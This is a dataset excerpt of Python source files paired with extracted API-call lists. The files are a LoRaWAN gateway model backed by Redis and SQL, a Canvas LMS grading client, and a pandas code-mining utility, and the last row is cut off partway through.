code
stringlengths 22
1.05M
| apis
sequencelengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
---|---|---|
from database.db0 import db0, ConstDB
from database.db3 import db3, ConstDB3
from utils.errors import KeyDuplicateError, ReadOnlyDeny
from utils.utils import eui_64_to_48, eui_48_to_64
from binascii import hexlify
from enum import Enum
import enum
from userver.frequency_plan import FrequencyPlan
from userver.object.asserts import Assertions
from userver.user.models import User
from sqlalchemy import Column, String, BINARY
from sqlalchemy import orm, ForeignKey
from database.db_sql import db_sql
import eviltransform
class Platform(Enum):
rpi = 'Raspberry Pi'
rpi3 = 'Raspberry Pi 3'
linklabs = 'LinkLabs'
@staticmethod
def assert_isinstanceof(value):
assert isinstance(value, Platform), '%r is not a valid Platform' % value
class Model(Enum):
imst = 'IMST'
linklabs = 'LinkLabs'
menthink = 'MenThink'
risinghf = 'RisingHF'
@staticmethod
def assert_isinstanceof(value):
assert isinstance(value, Model), '%r is not a valid Model' % value
class Field:
id = 'id'
mac_addr = 'mac_addr'
name = 'name'
platform = 'platform'
model = 'model'
freq_plan = 'freq_plan'
public = 'public'
disable = 'disable'
time = 'time'
lng = 'lng'
lat = 'lat'
alt = 'alt'
location = 'location'
user_id = 'user_id'
restart = 'restart'
class Location:
_assert_switcher = {Field.lng: Assertions.a_float,
Field.lat: Assertions.a_float,
Field.alt: Assertions.a_int, }
def __setattr__(self, key, value):
self._assert_switcher[key](value)
self.__dict__[key] = value
def __init__(self, lng, lat, alt):
self.lng = lng
self.lat = lat
self.alt = alt
self.switch_wgs2gcj()
def __str__(self):
return '%s,%s,%s' % (self.lng, self.lat, self.alt)
def obj_to_dict(self):
info = {}
for key, value in self.__dict__.items():
if key in (Field.lng, Field.lat, Field.alt):
info[key] = value
return info
def switch_wgs2gcj(self):
self.lat, self.lng = eviltransform.wgs2gcj(self.lat, self.lng)
@staticmethod
def assert_isinstanceof(value):
assert isinstance(value, Location), '%r is not a valid Location' % value
class objects:
@staticmethod
def str_to_obj(string):
string = string.split(',')
try:
return Location(float(string[0]), float(string[1]), int(string[2]))
except Exception as error:
raise error
class Gateway(db_sql.Model):
redis_fields = (Field.user_id, Field.platform, Field.model, Field.freq_plan, Field.public, Field.disable, Field.location)
__vars_can_write = (Field.platform, Field.model, Field.freq_plan, Field.public, Field.disable, Field.name, Field.location)
_assert_switcher = {
Field.user_id: Assertions.a_not_negative_int,
Field.id: Assertions.a_eui_64,
Field.mac_addr: Assertions.a_eui_48,
Field.name: Assertions.a_str,
Field.platform: Platform.assert_isinstanceof,
Field.freq_plan: FrequencyPlan.assert_isinstanceof,
Field.model: Model.assert_isinstanceof,
Field.public: Assertions.a_bool,
Field.disable: Assertions.a_bool,
Field.restart: Assertions.a_bool,
Field.location: Location.assert_isinstanceof,
Field.time: Assertions.a_int,
}
__table_args__ = {'schema': 'nwkserver'}
__tablename__ = 'gateway'
id = Column(BINARY(8), primary_key=True)
name = Column(String(50))
user_id = db_sql.Column(db_sql.Integer(), ForeignKey(User.id, ondelete='CASCADE', onupdate='CASCADE'), nullable=False)
@orm.reconstructor
def init_on_load(self):
self.mac_addr = eui_64_to_48(self.id)
info = db0.hgetall(ConstDB.gateway + hexlify(self.id).decode())
self.freq_plan = FrequencyPlan(info[b'freq_plan'].decode())
self.public = bool(int(info[b'public']))
self.disable = bool(int(info[b'disable']))
self.platform = Platform[info[b'platform'].decode()]
self.model = Model[info[b'model'].decode()]
location = info.get(b'location')
if location is not None:
self.location = Location.objects.str_to_obj(location.decode())
else:
self.location = Location(0.0, 0.0, 0)
time = db3.get(ConstDB3.T_GATEWAY + hexlify(self.id).decode())
if time is not None:
self.time = int(time)
def __setattr__(self, key, value):
try:
attr = getattr(self, key)
if attr is not None and key not in self.__vars_can_write:
raise ReadOnlyDeny
except AttributeError:
pass
if key in self._assert_switcher:
self._assert_switcher[key](value)
super.__setattr__(self, key, value)
def __init__(self, user_id, mac_addr, name, platform, model, freq_plan=FrequencyPlan.EU863_870, public=True, disable=False, location=None):
"""
:param id: 8 bytes
:param name: str
:param platform: Platform
:return:
"""
self.user_id = user_id
self.id = eui_48_to_64(mac_addr)
self.name = name
self.platform = platform
self.freq_plan = freq_plan
self.public = public
self.disable = disable
self.model = model
if location is not None:
self.location = location
else:
self.location = Location(0.0, 0.0, 0)
def _zip_vars(self):
return dict(zip(self.redis_fields,
(self.user_id, self.platform.name, self.model.name, self.freq_plan.value, self.public.real, self.disable.real, str(self.location))))
def _zip_vars_can_write(self):
dd = {}
for field in self.redis_fields:
if field in self.__vars_can_write:
value = getattr(self, field)
if isinstance(value, enum.Enum):
value = value.value if field == Field.freq_plan else value.name
elif isinstance(value, bool):
value = value.real
dd[field] = value
return dd
def send_restart_request(self):
db0.hset(ConstDB.gateway + hexlify(self.id).decode(), 'restart', 1)
def save(self):
db_sql.session.add(self)
id_str = hexlify(self.id).decode()
key = ConstDB.gateway + id_str
if db0.exists(key):
raise KeyDuplicateError(key)
db0.hmset(key, self._zip_vars())
#save to sql
db_sql.session.commit()
db_sql.session.registry.clear()
def update(self):
print(self._zip_vars_can_write())
db0.hmset(ConstDB.gateway + hexlify(self.id).decode(), self._zip_vars_can_write())
db_sql.session.commit()
def delete(self):
db_sql.session.delete(self)
db_sql.session.commit()
# delete from sql
id = hexlify(self.id).decode()
gateway_trans = db0.keys(pattern=ConstDB.trans_params + '*' + id)
pipe = db0.pipeline()
for key in gateway_trans:
key = key.decode()
pipe.delete(key)
dev_eui = key.split(":")[1]
pipe.zrem(ConstDB.dev_gateways + dev_eui, self.id)
pipe.delete(ConstDB.gateway + id)
pipe.delete(ConstDB.gateway_pull + id)
pipe.execute()
def obj_to_dict(self):
dd = {
'id': hexlify(self.id).decode().upper(),
'mac_addr': hexlify(self.mac_addr).decode().upper(),
'name': self.name,
'platform': self.platform.value,
'model': self.model.value,
'freq_plan': self.freq_plan.value,
'public': self.public,
'disable': self.disable,
'location': self.location.obj_to_dict(),
}
if hasattr(self, 'time'):
dd['last_data'] = self.time
self.get_pull_info()
if hasattr(self, 'ip_addr'):
dd['ip'] = self.ip_addr
if hasattr(self, 'prot_ver'):
dd['ver'] = self.prot_ver
return dd
def get_pull_info(self):
key = ConstDB.gateway_pull + hexlify(self.id).decode()
info = db0.hgetall(key)
if info:
self.ip_addr = info[b'ip_addr'].decode()
self.prot_ver = int(info[b'prot_ver'])
if __name__ == '__main__':
print(Model('IMST')) | [
"utils.utils.eui_64_to_48",
"database.db0.db0.hgetall",
"database.db_sql.db_sql.session.delete",
"database.db0.db0.exists",
"binascii.hexlify",
"utils.errors.KeyDuplicateError",
"database.db0.db0.keys",
"database.db0.db0.pipeline",
"sqlalchemy.ForeignKey",
"sqlalchemy.BINARY",
"eviltransform.wgs2gcj",
"database.db_sql.db_sql.session.registry.clear",
"database.db_sql.db_sql.Integer",
"sqlalchemy.String",
"database.db_sql.db_sql.session.add",
"utils.utils.eui_48_to_64",
"database.db_sql.db_sql.session.commit"
] | [((2130, 2171), 'eviltransform.wgs2gcj', 'eviltransform.wgs2gcj', (['self.lat', 'self.lng'], {}), '(self.lat, self.lng)\n', (2151, 2171), False, 'import eviltransform\n'), ((3764, 3773), 'sqlalchemy.BINARY', 'BINARY', (['(8)'], {}), '(8)\n', (3770, 3773), False, 'from sqlalchemy import Column, String, BINARY\n'), ((3811, 3821), 'sqlalchemy.String', 'String', (['(50)'], {}), '(50)\n', (3817, 3821), False, 'from sqlalchemy import Column, String, BINARY\n'), ((3851, 3867), 'database.db_sql.db_sql.Integer', 'db_sql.Integer', ([], {}), '()\n', (3865, 3867), False, 'from database.db_sql import db_sql\n'), ((3869, 3928), 'sqlalchemy.ForeignKey', 'ForeignKey', (['User.id'], {'ondelete': '"""CASCADE"""', 'onupdate': '"""CASCADE"""'}), "(User.id, ondelete='CASCADE', onupdate='CASCADE')\n", (3879, 3928), False, 'from sqlalchemy import orm, ForeignKey\n'), ((4022, 4043), 'utils.utils.eui_64_to_48', 'eui_64_to_48', (['self.id'], {}), '(self.id)\n', (4034, 4043), False, 'from utils.utils import eui_64_to_48, eui_48_to_64\n'), ((5440, 5462), 'utils.utils.eui_48_to_64', 'eui_48_to_64', (['mac_addr'], {}), '(mac_addr)\n', (5452, 5462), False, 'from utils.utils import eui_64_to_48, eui_48_to_64\n'), ((6599, 6623), 'database.db_sql.db_sql.session.add', 'db_sql.session.add', (['self'], {}), '(self)\n', (6617, 6623), False, 'from database.db_sql import db_sql\n'), ((6717, 6732), 'database.db0.db0.exists', 'db0.exists', (['key'], {}), '(key)\n', (6727, 6732), False, 'from database.db0 import db0, ConstDB\n'), ((6845, 6868), 'database.db_sql.db_sql.session.commit', 'db_sql.session.commit', ([], {}), '()\n', (6866, 6868), False, 'from database.db_sql import db_sql\n'), ((6877, 6908), 'database.db_sql.db_sql.session.registry.clear', 'db_sql.session.registry.clear', ([], {}), '()\n', (6906, 6908), False, 'from database.db_sql import db_sql\n'), ((7073, 7096), 'database.db_sql.db_sql.session.commit', 'db_sql.session.commit', ([], {}), '()\n', (7094, 7096), False, 'from database.db_sql import db_sql\n'), ((7128, 7155), 'database.db_sql.db_sql.session.delete', 'db_sql.session.delete', (['self'], {}), '(self)\n', (7149, 7155), False, 'from database.db_sql import db_sql\n'), ((7164, 7187), 'database.db_sql.db_sql.session.commit', 'db_sql.session.commit', ([], {}), '()\n', (7185, 7187), False, 'from database.db_sql import db_sql\n'), ((7277, 7326), 'database.db0.db0.keys', 'db0.keys', ([], {'pattern': "(ConstDB.trans_params + '*' + id)"}), "(pattern=ConstDB.trans_params + '*' + id)\n", (7285, 7326), False, 'from database.db0 import db0, ConstDB\n'), ((7342, 7356), 'database.db0.db0.pipeline', 'db0.pipeline', ([], {}), '()\n', (7354, 7356), False, 'from database.db0 import db0, ConstDB\n'), ((8520, 8536), 'database.db0.db0.hgetall', 'db0.hgetall', (['key'], {}), '(key)\n', (8531, 8536), False, 'from database.db0 import db0, ConstDB\n'), ((6752, 6774), 'utils.errors.KeyDuplicateError', 'KeyDuplicateError', (['key'], {}), '(key)\n', (6769, 6774), False, 'from utils.errors import KeyDuplicateError, ReadOnlyDeny\n'), ((6641, 6657), 'binascii.hexlify', 'hexlify', (['self.id'], {}), '(self.id)\n', (6648, 6657), False, 'from binascii import hexlify\n'), ((7227, 7243), 'binascii.hexlify', 'hexlify', (['self.id'], {}), '(self.id)\n', (7234, 7243), False, 'from binascii import hexlify\n'), ((8479, 8495), 'binascii.hexlify', 'hexlify', (['self.id'], {}), '(self.id)\n', (8486, 8495), False, 'from binascii import hexlify\n'), ((4089, 4105), 'binascii.hexlify', 'hexlify', (['self.id'], {}), '(self.id)\n', (4096, 4105), False, 'from binascii import hexlify\n'), ((4654, 4670), 'binascii.hexlify', 'hexlify', (['self.id'], {}), '(self.id)\n', (4661, 4670), False, 'from binascii import hexlify\n'), ((6529, 6545), 'binascii.hexlify', 'hexlify', (['self.id'], {}), '(self.id)\n', (6536, 6545), False, 'from binascii import hexlify\n'), ((7010, 7026), 'binascii.hexlify', 'hexlify', (['self.id'], {}), '(self.id)\n', (7017, 7026), False, 'from binascii import hexlify\n'), ((7729, 7745), 'binascii.hexlify', 'hexlify', (['self.id'], {}), '(self.id)\n', (7736, 7745), False, 'from binascii import hexlify\n'), ((7790, 7812), 'binascii.hexlify', 'hexlify', (['self.mac_addr'], {}), '(self.mac_addr)\n', (7797, 7812), False, 'from binascii import hexlify\n')] |
import logging
import pytz
from urllib.parse import urlencode, urljoin, urlparse, parse_qs
import requests
from django.conf import settings
from ol_openedx_canvas_integration.constants import DEFAULT_ASSIGNMENT_POINTS
log = logging.getLogger(__name__)
class CanvasClient:
def __init__(self, canvas_course_id):
self.session = self.get_canvas_session()
self.canvas_course_id = canvas_course_id
@staticmethod
def get_canvas_session():
"""
Create a request session with the access token
"""
session = requests.Session()
session.headers.update({
"Authorization": "Bearer {token}".format(token=settings.CANVAS_ACCESS_TOKEN)
})
return session
@staticmethod
def _add_per_page(url, per_page):
"""
Add per_page query parameter to override default value of 10
Args:
url (str): The url to update
per_page (int): The new per_page value
Returns:
str: The updated URL
"""
pieces = urlparse(url)
query = parse_qs(pieces.query)
query['per_page'] = per_page
query_string = urlencode(query, doseq=True)
pieces = pieces._replace(query=query_string)
return pieces.geturl()
def _paginate(self, url, *args, **kwargs):
"""
Iterate over the paginated results of a request
"""
url = self._add_per_page(url, 100) # increase per_page to 100 from default of 10
items = []
while url:
resp = self.session.get(url, *args, **kwargs)
resp.raise_for_status()
items.extend(resp.json())
links = requests.utils.parse_header_links(resp.headers["link"])
url = None
for link in links:
if link["rel"] == "next":
url = link["url"]
return items
def list_canvas_enrollments(self):
"""
Fetch canvas enrollments. This may take a while, so don't run in the request thread.
Returns:
dict: Email addresses mapped to canvas user ids for all enrolled users
"""
url = urljoin(
settings.CANVAS_BASE_URL,
"/api/v1/courses/{course_id}/enrollments".format(course_id=self.canvas_course_id)
)
enrollments = self._paginate(url)
return {
enrollment["user"]["login_id"].lower(): enrollment["user"]["id"]
for enrollment in enrollments
}
def list_canvas_assignments(self):
"""
List Canvas assignments
Returns:
list: A list of assignment dicts from Canvas
"""
url = urljoin(settings.CANVAS_BASE_URL, "/api/v1/courses/{course_id}/assignments".format(
course_id=self.canvas_course_id
))
return self._paginate(url)
def get_assignments_by_int_id(self):
assignments = self.list_canvas_assignments()
assignments_dict = {
assignment.get("integration_id"): assignment["id"]
for assignment in assignments
if assignment.get("integration_id") is not None
}
assignments_without_integration_id = sorted([
assignment["id"] for assignment in assignments if assignment.get("integration_id") is None
])
if assignments_without_integration_id:
log.warning(
"These assignments are missing an integration_id: %s",
", ".join(str(assignment_id) for assignment_id in assignments_without_integration_id)
)
return assignments_dict
def list_canvas_grades(self, assignment_id):
"""
List grades for a Canvas assignment
Args:
assignment_id (int): The canvas assignment id
"""
url = urljoin(
settings.CANVAS_BASE_URL,
"/api/v1/courses/{course_id}/assignments/{assignment_id}/submissions".format(
course_id=self.canvas_course_id,
assignment_id=assignment_id,
)
)
return self._paginate(url)
def create_canvas_assignment(self, payload):
"""
Create an assignment on Canvas
Args:
payload (dict):
"""
return self.session.post(
url=urljoin(
settings.CANVAS_BASE_URL,
"/api/v1/courses/{course_id}/assignments".format(course_id=self.canvas_course_id)
),
json=payload,
)
def update_assignment_grades(self, canvas_assignment_id, payload):
return self.session.post(
url=urljoin(
settings.CANVAS_BASE_URL,
"/api/v1/courses/{course_id}/assignments/{assignment_id}/submissions/update_grades".format(
course_id=self.canvas_course_id,
assignment_id=canvas_assignment_id
)
),
data=payload,
)
def create_assignment_payload(subsection_block):
"""
Create a Canvas assignment dict matching a subsection block on edX
Args:
subsection_block (openedx.core.djangoapps.content.block_structure.block_structure.BlockData):
The block data for the graded assignment/exam (in the structure of a course, this unit is a subsection)
Returns:
dict:
Assignment payload to be sent to Canvas to create or update the assignment
"""
return {
"assignment": {
"name": subsection_block.display_name,
"integration_id": str(subsection_block.location),
"grading_type": "percent",
"points_possible": DEFAULT_ASSIGNMENT_POINTS,
"due_at": (
None if not subsection_block.fields.get("due")
# The internal API gives us a TZ-naive datetime for the due date, but Studio indicates that
# the user should enter a UTC datetime for the due date. Coerce this to UTC before creating the
# string representation.
else subsection_block.fields["due"].astimezone(pytz.UTC).isoformat()
),
"submission_types": ["none"],
"published": False,
}
}
def update_grade_payload_kv(user_id, grade_percent):
"""
Returns a key/value pair that will be used in the body of a bulk grade update request
Args:
user_id (int): The Canvas user ID
grade_percent (numpy.float64): The percent score of the grade (between 0 and 1)
Returns:
(tuple): A key/value pair that will be used in the body of a bulk grade update request
"""
return (
"grade_data[{user_id}][posted_grade]".format(user_id=user_id),
"{pct}%".format(pct=grade_percent * 100)
)
| [
"urllib.parse.urlencode",
"requests.Session",
"requests.utils.parse_header_links",
"logging.getLogger",
"urllib.parse.parse_qs",
"urllib.parse.urlparse"
] | [((228, 255), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (245, 255), False, 'import logging\n'), ((564, 582), 'requests.Session', 'requests.Session', ([], {}), '()\n', (580, 582), False, 'import requests\n'), ((1064, 1077), 'urllib.parse.urlparse', 'urlparse', (['url'], {}), '(url)\n', (1072, 1077), False, 'from urllib.parse import urlencode, urljoin, urlparse, parse_qs\n'), ((1094, 1116), 'urllib.parse.parse_qs', 'parse_qs', (['pieces.query'], {}), '(pieces.query)\n', (1102, 1116), False, 'from urllib.parse import urlencode, urljoin, urlparse, parse_qs\n'), ((1177, 1205), 'urllib.parse.urlencode', 'urlencode', (['query'], {'doseq': '(True)'}), '(query, doseq=True)\n', (1186, 1205), False, 'from urllib.parse import urlencode, urljoin, urlparse, parse_qs\n'), ((1699, 1754), 'requests.utils.parse_header_links', 'requests.utils.parse_header_links', (["resp.headers['link']"], {}), "(resp.headers['link'])\n", (1732, 1754), False, 'import requests\n')] |
import builtins
import collections
import contextlib
import glob
import io
import os
import string
from typing import Dict, Any, Tuple, List, Collection, Optional
import attrs
import pandas as pd
from databutler.pat import astlib
from databutler.pat.analysis.type_analysis.mypy_types import SerializedMypyType
DF_TYPE = "pandas.core.frame.DataFrame"
SERIES_TYPE = "pandas.core.series.Series"
DF_GROUPBY_TYPE = "pandas.core.groupby.generic.DataFrameGroupBy"
SERIES_GROUPBY_TYPE = "pandas.core.groupby.generic.SeriesGroupBy"
BASE_GROUPBY_TYPE = "pandas.core.groupby.groupby.GroupBy"
GROUPBY_TYPES = {
BASE_GROUPBY_TYPE,
DF_GROUPBY_TYPE,
SERIES_GROUPBY_TYPE,
}
NewTarget = astlib.AstNode
DfArgs = List[str]
SeriesArgs = List[str]
NodeReplMap = Dict[astlib.AstNode, astlib.AstNode]
JsonDict = Dict
_BUILTIN_FUNCS = {k for k in builtins.__dict__ if not k.startswith("_")}
@attrs.define(eq=False, repr=False)
class MinedResult:
code: str
template: str
kind: str
nb_owner: str
nb_slug: str
uid: str
expr_type: Optional[SerializedMypyType]
type_map: Dict[str, SerializedMypyType]
df_vars: List[str]
series_vars: List[str]
template_vars: Dict[str, List[str]]
lib_usages: Dict[str, str] = attrs.field(factory=dict)
def to_json(self) -> JsonDict:
pass
@classmethod
def from_json(cls, json_dict: JsonDict) -> 'MinedResult':
pass
def prettify(self) -> str:
with contextlib.redirect_stdout(io.StringIO()) as f_out:
url = f"https://kaggle.com/{self.nb_owner}/{self.nb_slug}"
print(f"UID: {self.uid}\nKind: {self.kind}\nURL: {url}")
print("----------")
print(f"Code:\n{self.code}")
print("----------")
print(f"Templatized:\n{self.template}")
print("----------")
print(f"Value Type: {'Any' if self.expr_type is None else self.expr_type.type_json}")
print("==========")
return f_out.getvalue()
def __repr__(self):
return self.prettify()
def __str__(self):
return self.prettify()
def is_purely_df_or_series_like(expr_type: SerializedMypyType):
if not (expr_type.equals(DF_TYPE) or expr_type.equals(SERIES_TYPE)):
return False
if expr_type.is_union_type():
return all(is_purely_df_or_series_like(i) or i.is_any_type() for i in expr_type.unpack_union_type())
else:
return True
def find_library_usages(
code_ast: astlib.AstNode
) -> Dict[astlib.Name, str]:
"""Finds variable uses that correspond to imports / library usage"""
# TODO: Perform proper dataflow analysis (reaching defs)
result: Dict[astlib.Name, str] = {}
defs, accesses = astlib.get_definitions_and_accesses(code_ast)
for def_ in defs:
if def_.enclosing_node is not None and isinstance(def_.enclosing_node, (astlib.Import, astlib.ImportFrom)):
key_dict = {}
if isinstance(def_.enclosing_node, astlib.Import):
prefix = ""
elif isinstance(def_.enclosing_node, astlib.ImportFrom) and def_.enclosing_node.module is not None:
prefix = astlib.to_code(def_.enclosing_node.module).strip() + "."
else:
continue
for alias in def_.enclosing_node.names:
name_str = astlib.to_code(alias.name).strip()
if alias.asname is None:
key_dict[name_str] = f"{prefix}{name_str}"
else:
key_dict[astlib.to_code(alias.asname.name).strip()] = f"{prefix}{name_str}"
for access in accesses:
if isinstance(access.node, astlib.Name):
if access.node.value in key_dict:
result[access.node] = key_dict[access.node.value]
return result
def find_constants(code_ast: astlib.AstNode) -> Dict[astlib.BaseExpression, Any]:
"""Finds constant expressions in the AST. Sound but not necessarily complete right now."""
# TODO: Perform proper dataflow analysis (constant propagation)
result: Dict[astlib.BaseExpression, Any] = {}
defs, accesses = astlib.get_definitions_and_accesses(code_ast)
# We will only focus on accesses whose defs are top-level statements to avoid
# having to bother about loops etc.
top_level_stmts = set(astlib.iter_body_stmts(code_ast))
accesses = [a for a in accesses if all(d.enclosing_node in top_level_stmts for d in a.definitions)]
numbering: Dict[astlib.AstNode, int] = {}
for idx, stmt in enumerate(astlib.iter_body_stmts(code_ast)):
for node in astlib.walk(stmt):
numbering[node] = idx
for access in accesses:
num = numbering[access.node]
# Find the closest top-level def
cur, score = None, None
for def_ in access.definitions:
d_num = numbering[def_.enclosing_node]
if d_num < num and (score is None or d_num > score):
cur, score = def_, d_num
if cur is None:
continue
if not isinstance(cur.enclosing_node, (astlib.AnnAssign, astlib.Assign)):
continue
if astlib.is_constant(cur.enclosing_node.value):
val = astlib.get_constant_value(cur.enclosing_node.value)
result[access.node] = val
return result
def replace_constants(
target: astlib.AstNode,
true_exprs: Collection[astlib.BaseExpression],
free_vars: Collection[astlib.Name],
constants: Dict[astlib.BaseExpression, Any],
) -> Tuple[NewTarget, NodeReplMap]:
"""Replace any constant variables with their concrete values, and update the inferred types dict"""
repl_dict = {}
for node in true_exprs:
if (not isinstance(node, astlib.Name)) or node not in free_vars:
continue
if node in constants:
repl_dict[node] = astlib.parse_expr(repr(constants[node]))
if len(repl_dict) == 0:
return target, {n: n for n in astlib.walk(target)}
output_mapping = {}
target = astlib.with_deep_replacements(target, repl_dict, output_mapping)
return target, output_mapping
def has_undefined_references(
target: astlib.AstNode,
free_vars: Collection[astlib.Name],
inferred_types: Dict[astlib.BaseExpression, SerializedMypyType],
lib_usages: Dict[astlib.Name, str],
) -> bool:
"""Checks if there are any undefined variables that are not library usages and not dfs/series"""
for node in free_vars:
if node not in lib_usages:
if node not in inferred_types:
return True
typ = inferred_types[node]
is_builtin_func = typ.is_callable_type() and node.value in _BUILTIN_FUNCS
if not (typ.equals(DF_TYPE) or typ.equals(SERIES_TYPE) or typ.is_bool_type() or is_builtin_func):
return True
return False
def normalize_df_series_vars(
target: astlib.AstNode,
true_exprs: Collection[astlib.BaseExpression],
free_vars: Collection[astlib.Name],
inferred_types: Dict[astlib.BaseExpression, SerializedMypyType],
) -> Tuple[NewTarget, DfArgs, SeriesArgs, NodeReplMap]:
"""Replaces variables corresponding to dataframes or series with standard names"""
seen_dfs: Dict[str, int] = {}
df_repl_map: Dict[astlib.Name, astlib.Name] = {}
seen_series: Dict[str, int] = {}
series_repl_map: Dict[astlib.Name, astlib.Name] = {}
for node in true_exprs:
if (not isinstance(node, astlib.Name)) or node not in inferred_types or node not in free_vars:
continue
# NOTE: If there is a union type of DataFrame and Series, DataFrame will be picked.
if inferred_types[node].equals(DF_TYPE):
if node.value not in seen_dfs:
seen_dfs[node.value] = len(seen_dfs) + 1
df_repl_map[node] = node # Will update later
elif inferred_types[node].equals(SERIES_TYPE):
if node.value not in seen_series:
seen_series[node.value] = len(seen_series) + 1
series_repl_map[node] = node # Will update later
if len({i.value for i in df_repl_map.keys()}) <= 1:
def df_arg_creator(ctr: int):
return "df"
else:
def df_arg_creator(ctr: int):
return f"df{ctr}"
if len({i.value for i in series_repl_map.keys()}) <= 1:
def series_arg_creator(ctr: int):
return "series"
else:
def series_arg_creator(ctr: int):
return f"series{ctr}"
for node in df_repl_map.keys():
df_repl_map[node] = astlib.create_name_expr(df_arg_creator(seen_dfs[node.value]))
for node in series_repl_map.keys():
series_repl_map[node] = astlib.create_name_expr(series_arg_creator(seen_series[node.value]))
output_map: NodeReplMap = {}
target = astlib.with_deep_replacements(target, {**df_repl_map, **series_repl_map}, output_map)
return (target,
sorted(i.value for i in df_repl_map.values()),
sorted(i.value for i in series_repl_map.values()),
output_map)
def normalize_call_args(
target: astlib.AstNode, inferred_types: Dict[astlib.BaseExpression, SerializedMypyType]
) -> Tuple[NewTarget, NodeReplMap]:
"""Normalize order of keyword arguments"""
repl_map: NodeReplMap = {}
for node in astlib.walk(target):
if not isinstance(node, astlib.Call):
continue
call_expr = node
if (call_expr.func not in inferred_types) or (not inferred_types[call_expr.func].is_callable_type()):
continue
if any(arg.star != "" for arg in call_expr.args):
# TODO: How to handle starred args?
continue
pos_args = [arg for arg in call_expr.args if arg.keyword is None]
kw_args = [arg for arg in call_expr.args if arg.keyword is not None]
arg_order = inferred_types[call_expr.func].get_callable_arg_order()
new_args = [*pos_args] + sorted(kw_args, key=lambda x: arg_order.get(x.keyword.value, 0))
if len(new_args) > 0:
new_args[-1] = new_args[-1].with_changes(comma=astlib.cst.MaybeSentinel.DEFAULT)
if new_args != call_expr.args:
repl_map[call_expr] = call_expr.with_changes(args=new_args)
output_mapping: NodeReplMap = {}
if len(repl_map) != 0:
target = astlib.with_deep_replacements(target, repl_map, output_mapping)
return target, output_mapping
def normalize_col_accesses(
target: astlib.AstNode,
true_exprs: Collection[astlib.BaseExpression],
inferred_types: Dict[astlib.BaseExpression, SerializedMypyType]
) -> Tuple[NewTarget, NodeReplMap]:
"""Normalizes col accesses by converting attribute-based accesses like df.Price to
subscript-based such as df['Price']"""
repl_map: NodeReplMap = {}
for expr in true_exprs:
if expr not in inferred_types:
continue
expr_typ = inferred_types[expr]
if isinstance(expr, astlib.Attribute):
value = expr.value
if value not in inferred_types:
continue
val_typ = inferred_types[value]
okay = False
# print("GOT HERE", val_typ, expr_typ)
if val_typ.equals(DF_TYPE) and (expr_typ.equals(DF_TYPE) or expr_typ.equals(SERIES_TYPE)):
try:
if (not hasattr(pd.DataFrame, expr.attr.value)) and (not hasattr(pd.Series, expr.attr.value)):
okay = True
except:
pass
elif (val_typ.equals(DF_GROUPBY_TYPE) and
(expr_typ.equals(DF_GROUPBY_TYPE) or expr_typ.equals(SERIES_GROUPBY_TYPE))):
try:
if not hasattr(pd.core.groupby.generic.DataFrameGroupBy, expr.attr.value):
okay = True
except:
pass
if okay:
new_node = astlib.parse_expr(f"dummy[\"{expr.attr.value}\"]").with_changes(value=expr.value)
repl_map[expr] = new_node
output_mapping: NodeReplMap = {}
if len(repl_map) != 0:
target = astlib.with_deep_replacements(target, repl_map, output_mapping)
return target, output_mapping
def templatize(
target: astlib.AstNode,
true_exprs: Collection[astlib.BaseExpression],
free_vars: Collection[astlib.Name],
inferred_types: Dict[astlib.BaseExpression, SerializedMypyType],
lib_usages: Dict[astlib.Name, str],
) -> Tuple[NewTarget, Dict[str, List[str]]]:
"""Replace constants and remaining variable names with standard ones to create a template suitable for clustering"""
type_to_exprs: Dict[str, List[astlib.BaseExpression]] = collections.defaultdict(list)
allowed_key_chars = set(string.ascii_letters + string.digits + "_")
for node in true_exprs:
is_const = astlib.is_constant(node)
const_val = None if not is_const else astlib.get_constant_value(node)
if not ((isinstance(node, astlib.Name) and node in free_vars) or
(is_const and not isinstance(const_val, (set, dict, list, tuple)))):
continue
if node in lib_usages:
continue
if node not in inferred_types:
if not is_const:
continue
key = type(const_val).__name__
else:
typ = inferred_types[node]
if typ.equals(DF_TYPE):
key = "df"
elif typ.equals(SERIES_TYPE):
key = "series"
elif typ.is_callable_type():
continue
elif typ.is_str_type():
key = "str"
elif typ.is_int_type():
key = "int"
elif typ.is_bool_type():
if isinstance(node, astlib.Name) and node.value in {"True", "False"}:
continue
key = "bool"
elif typ.is_float_type():
key = "float"
else:
while typ.is_union_type():
typ = typ.unpack_union_type()[0]
if isinstance(typ.type_json, str):
key = typ.type_json
else:
key = str(typ.type_json.get('.class', "VAR"))
key = "".join(i if i in allowed_key_chars else '_' for i in key)
type_to_exprs[key].append(node)
# print("Adding", key, astlib.to_code(node))
ctr_map: Dict[str, Dict[str, int]] = {k: {} for k in type_to_exprs.keys()}
repl_map: NodeReplMap = {}
names_map: Dict[str, List[str]] = collections.defaultdict(list)
for typ_key, exprs in type_to_exprs.items():
ctr_map_entry = ctr_map[typ_key]
for expr in exprs:
node_key = astlib.to_code(expr)
if node_key not in ctr_map_entry:
ctr_map_entry[node_key] = idx = len(ctr_map_entry) + 1
names_map[typ_key].append(f"{typ_key.upper()}{idx}")
idx = ctr_map_entry[node_key]
repl_map[expr] = astlib.create_name_expr(f"{typ_key.upper()}{idx}")
return astlib.with_deep_replacements(target, repl_map), names_map
def get_mypy_cache_dir_path(uid: int) -> str:
"""Returns a cache dir to use for mypy based on a UID. Useful for multiprocess safety."""
script_dir = os.path.abspath(os.path.dirname(__file__))
return os.path.join(script_dir, f".mypy_cache{uid}")
def get_created_mypy_cache_dir_paths() -> List[str]:
"""Returns all the created mypy cache dirs"""
script_dir = os.path.abspath(os.path.dirname(__file__))
return glob.glob(os.path.join(script_dir, ".mypy_cache*"))
| [
"databutler.pat.astlib.with_deep_replacements",
"io.StringIO",
"os.path.dirname",
"databutler.pat.astlib.walk",
"collections.defaultdict",
"databutler.pat.astlib.iter_body_stmts",
"databutler.pat.astlib.is_constant",
"databutler.pat.astlib.get_constant_value",
"databutler.pat.astlib.parse_expr",
"attrs.field",
"attrs.define",
"os.path.join",
"databutler.pat.astlib.to_code",
"databutler.pat.astlib.get_definitions_and_accesses"
